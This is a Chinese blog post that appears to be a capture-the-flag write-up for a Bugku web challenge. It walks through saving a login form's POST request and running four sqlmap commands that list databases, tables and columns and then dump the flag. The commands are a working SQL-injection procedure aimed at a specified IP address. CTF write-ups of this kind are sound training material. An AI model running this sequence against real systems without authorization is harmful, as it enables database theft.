• bugku_web_这是一个神奇的登录界面


    首先,通过这个URL:http://120.24.86.145:9001/sql/

    和这个风骚的界面,很明显的SQL注入题目

    然后打开源代码看看:

    action居然没有目标脚本???

    这基本上可以验证就是使用sql注入了

    既然是sql注入,那就要用到注入神器sqlmap了!

    不过,因为这是post方法,所以我们只能使用-r + 请求头的方式

      接下来是保存请求头

      首先打开火狐代理:

      

      //无关紧要的小技巧:最好在输入框里输入好用户名和密码之后再点提交

      

      //无关紧要的注意点:一定要把里面的内容全选(Ctrl+A)再copy to file

      我又把保存好的文件拖到了kali攻击机上,路径是:/zzz/1.txt

    接下来素质四连它:

    //以下命令在kali 2.0中运行正常

    1、sqlmap -r "/zzz/1.txt" -p admin_name --dbs

    -r + 路径是以只读方式打开 -p + admin_name是选取admin_name为注入点(injection point) --dbs是爆破数据库名

    2、sqlmap -r "/zzz/1.txt" -D bugkusql1 -p admin_name --tables

    --tables 是爆列表名

    3、sqlmap -r "/zzz/1.txt" -D bugkusql1 -T flag1 -p admin_name --columns

    --columns是爆列名

    4、sqlmap -r "/zzz/1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump

    --dump是爆字段

    ??我不明白的是,为什么爆字段的时候,不需要输入y/n而是不停的回车就行了呢?这两种操作究竟有什么不同呢?

    最后得到flag

  • 相关阅读:
    诊断Oracle 服从成绩
    联机热备份失踪败后,怎样翻开数据库?
    Oracle 8.0.4 for Windows NT的装配
    Oracle常用数据字典
    怎样快速查出Oracle数据库中的锁等待
    Oracle不凡包
    Developer/2000 R2.1 中文版 在 Windows NT 上的安置
    Oracle中巧用FORMS_DDL
    Oracle 基本常识
    autorun的执行的命令行
  • 原文地址:https://www.cnblogs.com/huangming-zzz/p/9726906.html
Copyright © 2020-2023  润新知